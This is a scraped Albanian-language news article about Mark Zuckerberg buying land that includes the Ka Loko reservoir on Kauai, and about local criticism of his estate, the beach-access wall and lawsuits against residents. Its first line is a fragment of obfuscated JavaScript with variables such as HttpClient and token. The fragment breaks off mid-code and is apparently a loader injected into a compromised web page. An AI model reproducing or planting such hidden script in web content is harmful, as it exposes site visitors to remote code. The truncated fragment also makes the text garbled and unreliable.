;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mark Zuckerberg bleu tokë dhe kritikat nuk ndalen!

By

Mark Zuckerberg ka shtuar 44 hektarë në pronën e tij të diskutueshme prej 6.070 hektarësh në Kauai, Hawaii, duke shhpenzuar 17 milionë dollarë për blerjen.

44 hektarë tokë që themeluesi i Facebook dhe gruaja e tij blenë së fundmi përfshin rezervuarin Ka Loko, një rezervuar shekullor diga e të cilit u prish në vitin 2006 dhe lëshoi 400 milion galonë ujë që vrau shtatë njerëz në bregun verior të Kauait.

Sipas zëdhënësit të çiftit Ben Labolt, rezervuari konsiderohet me rrezik të lartë dhe nuk është riparuar. Zuckerbergët janë të përkushtuar për të përmbushur kërkesat ligjore që rrethojnë rezervuarin, tha Labolt për Business Insider.

Pasuria masive e Zuckerberg ka hasur në kritika dhe polemika në të kaluarën. Në vitin 2016, Zuckerberg zemëroi fqinjët kur ndërtoi një mur guri 2 metra rreth pronës së tij që bllokoi hyrjen e lehtë në plazhin Pila’a, në një përpjekje për të ulur zhurmën e autostradës dhe rrugës.

Më pas, në fillim të vitit 2017, avokatët e Zuckerberg ngritën padi kundër qindra banorëve vendas të Havait, të cilët mund të kenë një interes brenda kufijve të pasurisë së tij. Paditë përdoren për të sqaruar historinë shpesh të ndërlikuar të pronësisë së tokës në shtet dhe shpesh mund t’i detyrojnë pronarët të nxjerrin në ankand tokat e tyre. Në disa raste, të pandehurve u kërkohet madje të paguajnë tarifat ligjore të paditësit – në këtë rast, njeriu i pestë më i pasur në botë.

“Kjo është fytyra e neokolonializmit,” tha Kapua Sproat, një profesor i drejtësisë në Universitetin e Hawait për The Guardian në 2017. “Edhe pse një shitje e detyruar mund të mos i zhvendosë fizikisht njerëzit, është gozhda e fundit në arkivol që na ndan nga toka.”

Zuckerberg ka një pasuri te patundshme në vlerë të 320 milionë dollarëve. /Prive.al

Artikuj të ngjashëm